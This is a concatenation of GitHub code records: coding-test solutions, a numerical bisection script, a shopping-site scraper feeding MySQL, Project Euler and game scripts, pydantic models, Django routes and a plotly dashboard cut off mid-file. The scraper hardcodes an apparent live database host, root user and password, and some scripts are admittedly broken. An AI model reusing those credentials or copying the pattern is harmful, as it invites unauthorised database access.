+{"seq_id":"9590839135","text":"from itertools import permutations\n\ndef solution(k, dungeons):\n answer = -1\n new_list = list(permutations(dungeons, len(dungeons)))\n arr = []\n for i in new_list:\n limit = k\n cnt = 0\n for j in i:\n required, consumption = j\n if limit >= required:\n limit -= consumption\n cnt += 1\n else:\n break\n arr.append(cnt)\n\n answer = max(arr)\n return answer\n\n# k\t dungeons\t result\n# 
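master_delete above removes a record by assigning `""` to one element of the `readlines()` output and rewriting the file; since `readlines()` keeps each trailing newline, the emptied element drops the whole line. A file-free illustration:

```python
# readlines() keeps the "\n" on every element, so blanking one element and
# re-joining removes that record entirely -- the trick master_delete uses.
import io

lines = io.StringIO("1;keep\n2;drop\n3;keep\n").readlines()
lines[1] = ""
print("".join(lines), end="")  # "1;keep\n3;keep\n" -> record 2 is gone
```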
80\t[[80,20],[50,40],[30,10]]\t3\n\nprint(solution(k=80, dungeons=[[80,20],[50,40],[30,10]]))","repo_name":"mieumje/Python_Coding_Test","sub_path":"Level2_Programmers/피로도.py","file_name":"피로도.py","file_ext":"py","file_size_in_byte":527,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"34087571529","text":"import math\nimport sys\n\ndef f(c,m, v):\n g = 9.8\n return ((g*m)/c)*(1-math.e**(-(c/m)*t))-v\n\n\n\ndef bissecao(c, v, t):\n m_ini = 50\n m_fim = 100\n m_meio = (m_ini+m_fim)/2\n\n while((f(c, m_meio, v) < -0.001) or (f(c,m_meio, v) > 0.001)):\n print(f(c, m_ini, v)*f(c, m_meio, v))\n if(f(c, m_ini, v)*f(c, m_meio, v)<0):\n m_fim = m_meio\n else:\n m_ini = m_meio\n m_meio = (m_ini+m_fim)/2\n \n return m_meio\n\n\nif __name__ == \"__main__\":\n\n c, v, t = map(float, sys.stdin.readline().split())\n \n print('%.2f' % bissecao(c,v,t))\n\n\n","repo_name":"JuniorNunes15/Matematica_Computacional","sub_path":"Topico_2_raízes_de_equacoes/02_paraquedismo.py","file_name":"02_paraquedismo.py","file_ext":"py","file_size_in_byte":599,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"203602536","text":"import requests\r\nfrom bs4 import BeautifulSoup\r\nimport timeit\r\nimport multiprocessing\r\nimport mysql.connector\r\nimport time\r\nfrom datetime import datetime\r\n\r\n# import json\r\n# from collections import OrderedDict\r\n\r\n# 파싱 방법 관련글\r\n# https://godoftyping.wordpress.com/2017/06/24/python-beautifulsoup/\r\n# https://twpower.github.io/84-how-to-use-beautiful-soup\r\n# https://www.crummy.com/software/BeautifulSoup/bs4/doc/#find-previous-siblings-and-find-previous-sibling\r\n\r\nmysqlConnector = mysql.connector.connect(\r\n host=\"13.209.50.185\",\r\n user=\"root\",\r\n passwd=\"cww1003\",\r\n database=\"choi\"\r\n)\r\n\r\nmycursor = mysqlConnector.cursor()\r\n\r\n\r\nstart = timeit.default_timer() #타이머 시작\r\n\r\n# headers = {'User-Agent':'Mozilla/5.0'}\r\n#\r\n# URL = 'https://vintagetalk.co.kr/product/search.html?view_type=&supplier_code=&category_no=&search_type=product_name&keyword=&exceptkeyword=&product_price1=1000&product_price2=100000000&order_by=recent&x=27&y=16&page=350&cate_no='\r\n# # 크롤링하려는 url\r\n# response =requests.get(URL, headers=headers)\r\n# #requests 를 활용하여 header를 붙인 url 접속으로 html을 가져온다.\r\n#\r\n# mall_name = \"vintagetalk\"\r\n#\r\n# html = response.text\r\n# #html을 text로 바꾼다.\r\n# # i = 0\r\n#\r\n# soup = BeautifulSoup(html,'html.parser')\r\n\r\n#html.parser를 사용해서 soup에 넣겠다.\r\n\r\n# selectedList = soup.select('#contents > div.xans-element-.xans-search.xans-search-result.ec-base-product > ul > li')\r\n# div.main_scroll_item.is--product > div > ul > li\r\n#contents > div.xans-element-.xans-search.xans-search-result.ec-base-product > ul > li > div > a'''\r\n'''\r\n이코드는 vintagetalk의 재고가 있는 상품의 모든 데이터를 서버에 저장하기 위한 코드이다.\r\n재고있는 상품 DB에 저장하는 방법 :\r\n 검색시 모든 상품에 공통되는 조건을 검색하면 (EX: 판매가격 범위 0 ~ 1000000원) 전체상품을 볼 수 있다.\r\n 최신순으로 250개씩 페이징 되어 보여지며, 재고가 있는 상품부터 보여진다.( 재고없는 상품이 있는 페이지가 나올 시 크롤링 종료)\r\n 1페이지부터 페이지에 있는 모든 상품(재고있는 상품)의 데이터를 서버의 각 쇼핑몰의 테이블에 저장한다.\r\n 한페이지가 끝나면 다음 페이지를 같은방식으로 진행한다.\r\n 이러다 팔린상품이 나오면 코드진행을 종료한다.\r\n\r\n 이 코드는 쇼핑몰의 트레픽이 덜 몰릴것으로 예상 되는 시간대를 선정해 하루 3번 실행한다.\r\n 그 사이에 팔린 상품은 걸러줄 수 없다.\r\n # 이경우는 한명의 클라가 A상품 상세포기를 눌렀을때 재고가 없는 상품이었을 경우\r\n 클라가 서버로 이 A상품은 재고가 없다는 것을 알려주어 DB를 업데이트 할 수 있게 한다.\r\n 이렇게 하면 그 후 다른 사용자에게는 A상품이 재고가 없다는 것을 반영하여 데이터를 재공할 수 있다. 
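The bisection in 02_paraquedismo.py evaluates `f` against a global `t` read later from stdin; a sketch with `t` passed explicitly and `math.exp`, keeping the same [50, 100] mass bracket (the tolerance value here is an assumption):

```python
# Explicit-argument version of the drag-equation root find above; v(m) is
# monotonic in m, so one sign change inside [50, 100] suffices for bisection.
import math

def f(c, m, v, t, g=9.8):
    return (g * m / c) * (1 - math.exp(-(c / m) * t)) - v

def bisect_mass(c, v, t, lo=50.0, hi=100.0, tol=1e-3):
    while hi - lo > tol:
        mid = (lo + hi) / 2
        if f(c, lo, v, t) * f(c, mid, v, t) < 0:
            hi = mid
        else:
            lo = mid
    return (lo + hi) / 2

m = bisect_mass(15, 40, 10)  # sample inputs that bracket a root
print(50 <= m <= 100)        # True
```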
\r\n\r\n'''\r\n\r\ni = 0\r\nisItem = True\r\n\r\ndef parsing(i):\r\n global isItem\r\n # print(selectedList[0].__len__(),\"개\")\r\n # for value in range(0,index):\r\n headers = {'User-Agent':'Mozilla/5.0'}\r\n\r\n URL = 'https://vintagetalk.co.kr/product/search.html?view_type=&supplier_code=&category_no=&search_type=product_name&keyword=&exceptkeyword=&product_price1=1000&product_price2=100000000&order_by=recent&x=27&y=16&page='+str(i)+'&cate_no='\r\n # 크롤링하려는 url\r\n # print(URL)\r\n response =requests.get(URL, headers=headers)\r\n #requests 를 활용하여 header를 붙인 url 접속으로 html을 가져온다.\r\n\r\n mall_name = \"vintagetalk\"\r\n\r\n html = response.text\r\n #html을 text로 바꾼다.\r\n # i = 0\r\n\r\n soup = BeautifulSoup(html,'html.parser')\r\n #html.parser를 사용해서 soup에 넣겠다.\r\n selectedList = soup.select('#contents > div.xans-element-.xans-search.xans-search-result.ec-base-product > ul > li')\r\n number = 0\r\n for value in selectedList:\r\n # alist = selectedList[value]\r\n alist = value\r\n\r\n # i = i+1\r\n atag = alist.find(\"a\")\r\n href = atag.get(\"href\")\r\n # print(href)\r\n\r\n img = alist.find(\"img\")\r\n # print(img) #이미지 태그 부분을 전부 찾아낸다.\r\n # find_all 을 썼을땐 get(\"\")를 쓸 수 없고, find를 썼을때만 get()를 쓸 수 있다\r\n\r\n\r\n imgs = alist.find_all(\"img\")\r\n # print(imgs.__len__())\r\n # print(imgs)\r\n # 상품정보가 담겨있는 li 태그 안에\r\n # img 태그가 3개면 soldout 된 상품이다. ( = 2번째 img태그가 soldout icon이다.)\r\n # img 태그가 2개면 제고가 있는 상품이다.\r\n number = number+1\r\n # if number == 30:\r\n # break\r\n # print(number)\r\n if imgs.__len__()==3:\r\n print(\"break\")\r\n isItem = False\r\n break\r\n\r\n # print(img.get(\"data-original\"))\r\n img_src = img.get(\"data-original\")\r\n # 2-3. 상품 이미지url값을 추출한다. // 왜 추출하는지 써야한다.\r\n # 이미지 url로 앱에서 이미지를 로드해 보여주기 때문에\r\n # print(img.get(\"alt\"))\r\n # prodName = img.get(\"alt\")\r\n splitedImgsrc = img_src.split('/')\r\n preProdNumb = splitedImgsrc[(splitedImgsrc.__len__()-1)].split('.')\r\n prodNumb = preProdNumb[0]\r\n # print(prodNumb)\r\n\r\n\r\n prices = alist.find_all('span') # tag 에서 span 을 다 찾아낸다.\r\n\r\n size = prices.__len__()\r\n #\r\n # print(prices[size-6].text)\r\n prodName = prices[size-6].text\r\n # 2-4. 상품 이름값을 추출한다.\r\n\r\n # print(prices[size-4])\r\n originalPrice = prices[size-4].text\r\n # print(originalPrice)\r\n #세일전 가격\r\n\r\n # print(prices[size-1].text)\r\n price = prices[size-1].text\r\n # 2-5. 
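parsing() above derives the product id from the last path segment of the thumbnail URL via two chained split() calls; the same extraction with rsplit, on an assumed URL shape:

```python
# prodNumb extraction equivalent to the split('/') / split('.') chain above;
# the example URL is an assumption about the thumbnail path layout.
img_src = "https://vintagetalk.co.kr/web/product/medium/12345.jpg"
print(img_src.rsplit("/", 1)[-1].split(".", 1)[0])  # 12345
```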
상품 가격을 추출한다.\r\n\r\n\r\n\r\n\r\n # sql = \"INSERT INTO allProducts_vintagetalk (mallName, img_src, prodName, prodNumb, price, salePrice, prodHref, modifiedDate, soldout) VALUES (%s, %s, %s, %s, %s, %s, %s, NOW(), %s)\"\r\n sql = \"INSERT INTO allProducts_vintagetalk (mallName, img_src, prodName, prodNumb, price, salePrice, prodHref, modifiedDate, soldout) VALUES (%s, %s, %s, %s, %s, %s, %s, NOW(), %s) ON DUPLICATE KEY UPDATE modifiedDate=NOW()\"\r\n mycursor.execute(sql, (mall_name, img_src, prodName, prodNumb, originalPrice, price, href, 1))\r\n\r\n\r\n # print()\r\n # break\r\n\r\n #print()\r\n\r\n # print(tag.text.strip())\r\n #tag 에서 텍스트만 보여주고, 쓸대없는 공백도 지운다.\r\n # file_data = OrderedDict()\r\n\r\ntesks = [0, 100, 200]\r\n# i = 0\r\n# for num in tesks:\r\n# parsing(num)\r\n\r\nwhile isItem:\r\n i = i+1\r\n #119\r\n # i = 1\r\n print(\"------------------------------\")\r\n print(i)\r\n parsing(i)\r\n mysqlConnector.commit()\r\n print(str(i)+\"페이지 후 3초 대기\")\r\n time.sleep(3) #차단 방지를 위해 2초 대기\r\n\r\n\r\n # break;\r\n # pass\r\n\r\n\r\n\r\n# if __name__ == '__main__':\r\n# #멀티쓰레딩 pool 사용\r\n# pool = multiprocessing.Pool(processes=3)\r\n# pool.map(parsing, tesks)\r\n# pool.close()\r\n# pool.join()\r\n\r\nstop = timeit.default_timer()\r\nprint(stop - start)\r\n# print(i)\r\n#이건 안되는겨?\r\n\r\n\r\n# # tag.select('\r\n# # img = tag.find_all(\"src\")\r\n# # img_url = tag.get(\"src\")\r\n# # img = tag.select('img')\r\n#\r\n# # div > div.thumbnail > a = 썸네일\r\n# # div.name > a > span:nth-child(2) > b 브랜드\r\n#\r\n#\r\n# # img_alt = img.get(\"src\")\r\n# img = tag.find(\"img\") #이미지 태그 부분을 전부 찾아낸다.\r\n# # print(img)\r\n# # find_all 을 썼을땐 get(\"\")를 쓸 수 없고, find를 썼을때만 get()를 쓸 수 있다.\r\n# print(img.get(\"src\"))\r\n# print(img.get(\"alt\"))\r\n#\r\n# prices = tag.find_all('span')\r\n# #tag 에서 span 을 다 찾아낸다.\r\n#\r\n# size = prices.__len__()\r\n# print(prices[size-2].text) #r가격\r\n#\r\n# # coasts = tag.find_all(\"li\", rel=\"판매가\")\r\n# # print(coasts[0].get_text)\r\n# # # for coast in coasts.find_all('span'):\r\n# # # print(coast)\r\n#\r\n#\r\n# icon = tag.find(\"div\", class_=\"icon\") # 솔드아웃\r\n# # print(icon.get('alt'))\r\n# # soldout = icon.get(\"alt\")\r\n# # print(soldout)\r\n# # 상품가격을 가져온다. 
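The INSERT above leans on MySQL's `ON DUPLICATE KEY UPDATE` so a re-crawled product only refreshes `modifiedDate`, and the sold-out test a few lines earlier counts `<img>` tags inside each listing. A mock of that count check with BeautifulSoup:

```python
# Three <img> tags in a listing <li> means the sold-out badge is present;
# two means the item is in stock -- the stop condition used by parsing().
from bs4 import BeautifulSoup

li = BeautifulSoup("<li><img/><img/><img/></li>", "html.parser")
print(len(li.find_all("img")) == 3)  # True -> sold out, crawl loop ends
```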
(= 5번째 span 값)\r\n# # soldout = icon[0].find(\"img\")\r\n# # print(icon)\r\n# test = icon.find('img')\r\n# print(test)\r\n# # 이렇게 하면 풀저x = none, 품절o = 값이 있음\r\n# # none 인지 아닌지로 구분하면 된다.\r\n","repo_name":"AllenChoiwonwoo/ec2Backup","sub_path":"test/getAllUnselledProduct.py","file_name":"getAllUnselledProduct.py","file_ext":"py","file_size_in_byte":8689,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"14201905331","text":"pnums = __import__(\"#61-2 - Cyclical Figurate Numbers - Polygonal\")\n\n\ndef permute(values):\n values = list(values)\n values.sort()\n end = list(values[::-1])\n permutations = [list(values)]\n current = list(values)\n while current != end:\n indexk = max([index for index in range(len(current)-1) if current[index] < current[index+1]])\n indexl = max([index for index in range(indexk, len(current)) if current[indexk] < current[index]])\n current[indexk], current[indexl] = current[indexl], current[indexk]\n current[indexk+1:] = current[:indexk:-1]\n permutations.append(list(current))\n return permutations\n\n\ntris = [[n, pnums.triangle(n)] for n in range(45, 141)] # T(45) = first 4 digit, T(140) = last 4 digit\nsquares = [[n, pnums.square(n)] for n in range(32, 100)] # S(32) = first 4 digit, S(99) = last 4 digit\npentas = [[n, pnums.pentagonal(n)] for n in range(26, 82)] # P(26) = first 4 digit, P(81) = last 4 digit\nhexas = [[n, pnums.hexagonal(n)] for n in range(23, 71)] # Hx(23) = first 4 digit, H(70) = last 4 digit\nheptas = [[n, pnums.heptagonal(n)] for n in range(21, 64)] # Hp(21) = first 4 digit, Hp(63) = last 4 digit\noctas = [[n, pnums.octagonal(n)] for n in range(19, 59)] # O(19) = first 4 digit, O(58) = last 4 digit\n\npossible = []\n\n# The following code doesn't work, and is unlikely to.\n# I wrote it after having interpreted the problem incorrectly.\n\nfor triI, triN in tris:\n cusquares = list(squares)\n delsquindexes = {int(triI)}\n cusquares = [[i, n] for i, n in cusquares if i not in delsquindexes]\n tribegins = [str(triN)[:2]]\n triends = [str(triN)[2:]]\n cusquares = [[i, n] for i, n in cusquares if (str(n)[2:] in tribegins) or (str(n)[:2] in triends)]\n\n for squI, squN in cusquares:\n cupentas = list(pentas)\n delpenindexes = set(delsquindexes)\n delpenindexes.add(int(squI))\n cupentas = [[i, n] for i, n in cupentas if i not in delpenindexes]\n squbegins = tribegins.copy() + [str(squN)[:2]]\n squends = triends.copy() + [str(squN)[2:]]\n cupentas = [[i, n] for i, n in cupentas if (str(n)[2:] in squbegins) or (str(n)[:2] in squends)]\n\n for penI, penN in cupentas:\n cuhexas = list(hexas)\n delhexindexes = set(delpenindexes)\n delhexindexes.add(int(penI))\n cuhexas = [[i, n] for i, n in cuhexas if i not in delhexindexes]\n penbegins = squbegins.copy() + [str(penN)[:2]]\n penends = squends.copy() + [str(penN)[2:]]\n cuhexas = [[i, n] for i, n in cuhexas if (str(n)[2:] in penbegins) or (str(n)[:2] in penends)]\n\n for hexI, hexN in cuhexas:\n cuheptas = list(heptas)\n delhepindexes = set(delhexindexes)\n delhepindexes.add(int(hexI))\n cuheptas = [[i, n] for i, n in cuheptas if i not in delhepindexes]\n hexbegins = penbegins.copy() + [str(hexN)[:2]]\n hexends = penends.copy() + [str(hexN)[2:]]\n cuheptas = [[i, n] for i, n in cuheptas if (str(n)[2:] in hexbegins) or (str(n)[:2] in hexends)]\n\n for hepI, hepN in cuheptas:\n cuoctas = list(octas)\n deloctindexes = set(delhepindexes)\n deloctindexes.add(int(hepI))\n cuoctas = [[i, n] for i, n in cuoctas if i not in deloctindexes]\n hepbegins = 
hexbegins.copy() + [str(hepN)[:2]]\n hepends = hexends.copy() + [str(hepN)[2:]]\n cuoctas = [[i, n] for i, n in cuoctas if (str(n)[2:] in hepbegins) or (str(n)[:2] in hepends)]\n\n for octI, octN in cuoctas:\n nums = [triN, squN, penN, hexN, hepN, octN]\n possible.append(nums)\n\nfound = False\nlength = len(possible)\nfor numsi, nums in enumerate(possible):\n for check in permute(nums):\n works = True\n for i in range(-1, len(check)-1):\n works = False if str(check[i])[2:] != str(check[i+1])[:2] else works\n if works:\n found = check.copy()\n break\n if found:\n break\n if numsi % 15 == 0:\n print(\"Completed %s of %s possible sequence checks.\" % (numsi, length))\n\nif found:\n print(\"FOUND SEQUENCE!\")\n print(found)\n print(\"Sum: %s\" % sum(found))\n","repo_name":"Lordfirespeed/BunchaPythonStuff","sub_path":"Project Euler/#61 - Cyclical Figurate Numbers.py","file_name":"#61 - Cyclical Figurate Numbers.py","file_ext":"py","file_size_in_byte":4356,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"31990022508","text":"import random\n\n# gives you the start\naction = input(\"Enter a choice (rock, paper, scissors): \\n\")\n\n# gives the choices\nchoices = [\"rock\", \"paper\", \"scissors\"]\ncomputer_choice = random.choice(choices)\nprint(f\"\\nYou chose {action}, computer chose {computer_choice}.\\n\")\n\n# tales the choices and then determines the winner\nif action == computer_choice:\n print(f\"Both players selected {action}. It's a tie!\")\nelif action == \"rock\":\n\n if computer_choice == \"scissors\":\n print(\"Rock smashes scissors! You win!\")\n else:\n print(\"Paper covers rock! You lose.\")\n\nelif action == \"paper\":\n if computer_choice == \"rock\":\n print(\"Paper covers rock! You win!\")\n else:\n print(\"Scissors cuts paper! You lose.\")\n\nelif action == \"scissors\":\n if computer_choice == \"paper\":\n print(\"Scissors cuts paper! You win!\")\n else:\n print(\"Rock smashes scissors! 
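The final check above starts `i` at -1 so the last number must chain back into the first; the same wrap-around test in one function, exercised on the 3-cycle quoted in the Project Euler #61 statement:

```python
# range(-1, n-1) makes nums[-1] -> nums[0] the first comparison, closing
# the cycle; 8128 -> 2882 -> 8281 -> 8128 is the problem's example triple.
def is_cyclic(nums):
    return all(str(nums[i])[2:] == str(nums[i + 1])[:2]
               for i in range(-1, len(nums) - 1))

print(is_cyclic([8128, 2882, 8281]))  # True
```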
You lose.\")\n \n","repo_name":"cruz006/python","sub_path":"projects/rock-paper-scissors.py","file_name":"rock-paper-scissors.py","file_ext":"py","file_size_in_byte":922,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"13642522518","text":"from pydantic import BaseModel, Field, EmailStr, validator\nfrom typing import Optional, List\nfrom bson import ObjectId\nfrom datetime import datetime\nfrom pprint import pprint\nfrom app.pkg.mongo_tools.tools import MongoTools\n\n\nclass PyObjectId(ObjectId):\n @classmethod\n def __get_validators__(cls):\n yield cls.validate\n\n @classmethod\n def validate(cls, v):\n if not ObjectId.is_valid(v):\n raise ValueError(\"Invalid objectid\")\n return ObjectId(v)\n\n @classmethod\n def __modify_schema__(cls, field_schema):\n field_schema.update(type=\"string\")\n\n\n'''User's model'''\n\nclass StatusModel(BaseModel):\n id: PyObjectId = Field(default_factory=PyObjectId, alias=\"_id\")\n status: str\n icon: str\n\nclass UserModel(BaseModel):\n vk: str = Field(..., alias=\"_id\")\n disabled: bool = False\n status: List[StatusModel] | None = None\n\n class Config:\n arbitrary_types_allowed = True\n allow_population_by_field_name = True\n orm_mode = True\n json_encoders = {ObjectId: str}\n schema_extra = {\n \"example\": {\n \"vk\": \"123456789\",\n \"disabled\": False,\n \"status\": []\n }\n }\n\nclass User(UserModel):\n hashed_password: str\n\n\n'''Category's model'''\n\nclass CategoryModel(BaseModel):\n category: str = Field(..., alias=\"_id\")\n\n class Config:\n arbitrary_types_allowed = True\n allow_population_by_field_name = True\n orm_mode = True\n json_encoders = {ObjectId: str}\n schema_extra = {\n 'example': {\n 'category': 'Метрология'\n }\n }\n\n\n'''University's model'''\n\nclass UniversityModel(BaseModel):\n university: str = Field(..., alias=\"_id\")\n\n class Config:\n arbitrary_types_allowed = True\n allow_population_by_field_name = True\n orm_mode = True\n json_encoders = {ObjectId: str}\n schema_extra = {\n 'example': {\n 'university': 'ТИУ'\n }\n }\n\n\n'''File's model'''\n\nclass FileModel(BaseModel):\n # id: PyObjectId = Field(default_factory=PyObjectId, alias=\"_id\")\n path: str\n\n\n'''Responce's model'''\n\nclass ResponceModel(BaseModel):\n id: PyObjectId = Field(default_factory=PyObjectId, alias=\"_id\")\n text: str\n price: int\n deliveryDate: str\n\n owner: UserModel\n created: str = datetime.strftime(datetime.now(), '%d.%m.%Y %H:%M')\n\n # @validator(\"deliveryDate\", pre=True)\n # def parse_deliveryDate(cls, value):\n # return datetime.strptime(\n # value,\n # '%d.%m.%Y %H:%M'\n # )\n \n # @validator(\"created\", pre=True)\n # def parse_created(cls, value):\n # return datetime.strptime(\n # value,\n # '%d.%m.%Y %H:%M'\n # )\n \n # @validator(\"owner\", pre=True)\n # async def check_link(cls, value):\n # user = await MongoTools.find_one('users', {'vk_id': value})\n # if user:\n # return user['_id']\n\n class Config:\n arbitrary_types_allowed = True\n allow_population_by_field_name = True\n orm_mode = True\n json_encoders = {ObjectId: str}\n schema_extra = {\n \"example\": {\n 'text': 'Готов выполнить задание!',\n 'price': 1200,\n 'deliveryDate': '12.12.2023 14:10',\n 'owner': {\n '_id': '123456789'\n },\n 'created': '12.12.2000 14:10',\n }\n }\n \n \n\n\n'''Task's model'''\n\nclass TaskModel(BaseModel):\n id: PyObjectId = Field(default_factory=PyObjectId, alias=\"_id\")\n title: str\n description: str\n category: CategoryModel\n university: UniversityModel\n orderDate: str 
= datetime.strftime(datetime.now(), '%d.%m.%Y %H:%M')\n deliveryDate: str\n files: List[FileModel] = []\n is_published: bool = False\n owner: UserModel\n responces: List[ResponceModel] = []\n\n # @validator(\"orderDate\", pre=True)\n # def parse_date(cls, value):\n # return datetime.strptime(\n # value,\n # '%d.%m.%Y %H:%M'\n # )\n \n # @validator(\"deliveryDate\", pre=True)\n # def parse_deliveryDate(cls, value):\n # return datetime.strptime(\n # value,\n # '%d.%m.%Y %H:%M'\n # )\n\n class Config:\n arbitrary_types_allowed = True\n allow_population_by_field_name = True\n orm_mode = True\n json_encoders = {ObjectId: str}\n schema_extra = {\n \"example\": {\n \"title\": \"Сделать метрологию\",\n \"description\": \"ПАМАГИТЕ\",\n \"category\": {\n \"category\": \"Метрология\"\n },\n \"university\": {\n \"university\": \"ТИУ\"\n },\n \"orderDate\": \"05.05.2023 14:00\",\n \"deliveryDate\": \"12.05.2023 14:00\",\n \"files\": [],\n \"is_published\": True,\n \"owner\": {\n \"vk\": \"123456789\"\n },\n \"responces\": [],\n }\n }\n\n\nclass UTaskModel(BaseModel):\n title: Optional[str]\n description: Optional[str]\n category: Optional[CategoryModel]\n university: Optional[UniversityModel]\n deliveryDate: Optional[datetime]\n files: Optional[List[FileModel]] = []\n is_published: Optional[bool] = False\n responces: Optional[List[ResponceModel]] = []\n \n @validator(\"deliveryDate\", pre=True)\n def parse_deliveryDate(cls, value):\n return datetime.strptime(\n value,\n '%d.%m.%Y %H:%M'\n )\n\n class Config:\n arbitrary_types_allowed = True\n json_encoders = {ObjectId: str}\n schema_extra = {\n \"example\": {\n \"title\": \"Сделать метрологию\",\n \"description\": \"ПАМАГИТЕ\",\n \"category\": {\n \"category\": \"Метрология\"\n },\n \"university\": {\n \"university\": \"ТИУ\"\n },\n \"orderDate\": \"05.05.2023 14:00\",\n \"deliveryDate\": \"12.05.2023 14:00\",\n \"files\": [],\n \"is_published\": True,\n \"owner\": {\n \"vk\": \"123456789\"\n },\n \"responces\": [],\n }\n }\n\n\n'''Token's model'''\n\nclass Token(BaseModel):\n # id: PyObjectId = Field(default_factory=PyObjectId, alias=\"_id\")\n acces_token: str\n token_type: str\n\nclass TokenData(BaseModel):\n # id: PyObjectId = Field(default_factory=PyObjectId, alias=\"_id\")\n vk_id: str","repo_name":"M1nt1k/stdx-fast-api-server","sub_path":"app/internal/schemas/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":6766,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"40186266992","text":"from typing import Tuple, Optional\nfrom pathlib import Path\nimport numpy as np\n\n\nclass DataGenerator(object):\n\n def __init__(self, config: int):\n super().__init__()\n self.__instance_num = config['instance_num']\n self.__ele_val_range = config['element_val_range']\n\n def generate(self, input_shapes: dict, exp_dir: str, output_shapes: Optional[dict] = None):\n # 创建存放位置\n save_dir = Path(exp_dir) / 'dataset'\n save_dir.mkdir(parents=True, exist_ok=True)\n\n # 生成dataset\n data_inputs_path = save_dir / 'inputs.npz'\n data_inputs = {input_name: self.__generate(input_shape) for input_name, input_shape in input_shapes.items()}\n np.savez(data_inputs_path, **data_inputs)\n\n # 生成ground_truth\n if output_shapes:\n ground_truths_path = save_dir / 'ground_truths.npz'\n ground_truths = {output_name: self.__generate(output_shape) for output_name, output_shape in output_shapes.items()}\n np.savez(ground_truths_path, **ground_truths)\n\n def __generate(self, shape: Tuple[Optional[int]]):\n a, 
b = self.__ele_val_range\n return np.random.rand(*(self.__instance_num, *shape[1:])) * (b - a) + a\n\n\nif __name__ == '__main__':\n config = {\n 'instance_num': 5,\n 'element_val_range': (-1000, 1000),\n }\n vig = DataGenerator(config)\n print(vig.generate((2, 3)))\n","repo_name":"library-testing/Muffin","sub_path":"src/cases_generation/data_generator.py","file_name":"data_generator.py","file_ext":"py","file_size_in_byte":1416,"program_lang":"python","lang":"en","doc_type":"code","stars":27,"dataset":"github-code","pt":"72"} +{"seq_id":"5453861237","text":"from django.urls import path\nfrom book.views import (\n BookDetailView,\n CategoryListView,\n SubCategoryListView,\n BookSearchView,\n CommentView,\n CommentLikeView,\n BooklistView\n)\n\nurlpatterns = [\n path('/', BookDetailView.as_view()),\n path('/category', CategoryListView.as_view()),\n path('/category/', SubCategoryListView.as_view()),\n path('/search/', BookSearchView.as_view()),\n path('//comment', CommentView.as_view()),\n path('/commentlike', CommentLikeView.as_view()),\n path('', BooklistView.as_view()),\n]\n","repo_name":"wecode-bootcamp-korea/13-Wellie-backend","sub_path":"book/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":606,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"21869801524","text":"import pandas as pd\nimport plotly.graph_objs as go\n\n\ndef cleandata(dataset, keepcolumns = ['Country Name', '1990','1995','2000' ,'2015'], value_variables = ['1990', '1995','2000','2015']):\n \"\"\"Clean world bank data for a visualizaiton dashboard\n\n Keeps data range of dates in keep_columns variable and data for the top 10 economies\n Reorients the columns into a year, country and value\n Saves the results to a csv file\n\n Args:\n dataset (str): name of the csv data file\n\n Returns:\n None\n\n \"\"\" \n df = pd.read_csv(dataset, skiprows=4)\n\n # Keep only the columns of interest (years and country name)\n df = df[keepcolumns]\n\n top10country = ['United States', 'China', 'Japan', 'Germany', 'United Kingdom', 'India', 'France', 'Brazil', 'Italy', 'Canada']\n df = df[df['Country Name'].isin(top10country)]\n\n # melt year columns and convert year to date time\n df_melt = df.melt(id_vars='Country Name', value_vars = value_variables)\n df_melt.columns = ['country','year', 'variable']\n df_melt['year'] = df_melt['year'].astype('datetime64[ns]').dt.year\n\n # output clean csv file\n return df_melt\n\ndef return_figures():\n \"\"\"Creates four plotly visualizations\n\n Args:\n None\n\n Returns:\n list (dict): list containing the four plotly visualizations\n\n \"\"\"\n\n # first chart plots arable land from 1990 to 2015 in top 10 economies \n # as a line chart\n \n graph_one = []\n df = cleandata('data/WB_GDP_per_capita.csv', \\\n keepcolumns = [ 'Country Name' ,'1990', '1991', '1992', '1993', '1994', '1995', '1996', '1997', '1998', '1999', '2000', '2001', '2002', '2003', '2004', '2005', '2006', '2007', '2008', '2009', '2010', '2011', '2012', '2013', '2014'],\\\n value_variables = [ '1990', '1991', '1992', '1993', '1994', '1995', '1996', '1997', '1998', '1999', '2000', '2001', '2002', '2003', '2004', '2005', '2006', '2007', '2008', '2009', '2010', '2011', '2012', '2013', '2014'] ) # WB_GDP_per_capita API_AG.LND.ARBL.HA.PC_DS2_en_csv_v2\n df.columns = ['country','year','gdp']\n df.sort_values('year', ascending=False, inplace=True)\n countrylist = df.country.unique().tolist()\n \n for country in countrylist:\n x_val = df[df['country'] == 
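__generate above maps uniform samples onto the configured value range with `rand * (b - a) + a`; a one-line check that generated elements land inside [a, b):

```python
# The affine map sends U[0,1) onto [a, b); verify bounds for the default
# element_val_range of (-1000, 1000).
import numpy as np

a, b = -1000, 1000
vals = np.random.rand(5, 3) * (b - a) + a
print(vals.min() >= a and vals.max() < b)  # True
```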
country].year.tolist()\n        y_val = df[df['country'] == country].gdp.tolist()\n        graph_one.append(\n          go.Scatter(\n          x = x_val,\n          y = y_val,\n          mode = 'lines',\n          name = country\n          )\n        )\n\n    layout_one = dict(title = 'Change in GDP per capita b/w 1990 to 2015',\n                xaxis = dict(title = 'Year',\n                  autotick=False, tick0=1990, dtick=25),\n                yaxis = dict(title = 'GDP'),\n                )\n\n# second chart plots total labor force for 2015 as a bar chart\n    graph_two = []\n    df = cleandata('data/WB_Labor_force.csv')\n    df.columns = ['country','year','laborforce']\n    df.sort_values('laborforce', ascending=False, inplace=True)\n    df = df[df['year'] == 2015] \n\n    graph_two.append(\n      go.Bar(\n      x = df.country.tolist(),\n      y = df.laborforce.tolist(),\n      )\n    )\n\n    layout_two = dict(title = 'Total Labor force in 2015',\n                xaxis = dict(title = 'Country',),\n                yaxis = dict(title = 'Total Labor Force'),\n                )\n\n\n# third chart plots electricity consumption from 1990 to 2015\n    graph_three = []\n    df = cleandata('data/WB_Elec_Pwr_cnsmp.csv', \\\n         